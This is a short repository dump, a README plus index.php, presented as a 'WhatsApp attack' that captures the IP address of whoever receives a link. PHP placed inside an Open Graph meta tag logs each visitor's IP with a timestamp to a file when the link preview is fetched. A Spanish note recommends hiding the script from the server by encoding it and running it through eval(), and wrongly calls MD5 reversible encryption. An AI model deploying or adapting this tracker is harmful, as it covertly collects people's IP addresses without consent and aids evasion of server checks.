This is a whastapp attack to obtain IP of receiver message

README.md

Mejoras

Puede evitar que el servidor detecte la presencia de este Script si lo coloca en base64 ó encripta con MD5 ó algo similar y posteriormente lo desencripta al momento de ejecutar y utilzando el String desencriptado en tiempo de ejecución lo coloca en una función eval() de esta manera se corre sin mostrar el código plano al servidor.

index.php

<!--
  This is explained in https://www.notion.so/macorreag/Capturar-una-rata-98216dd5c96545bba302c6cbd92b01a6
-->

<meta property=»og:description» content=»<?php

echo $_SERVER[REMOTE_ADDR]; $line = date(’Y-m-d H:i:s’) . » – $_SERVER[REMOTE_ADDR]»;echo $line;

file_put_contents(’visitors.log’, $line . PHP_EOL, FILE_APPEND);?>» />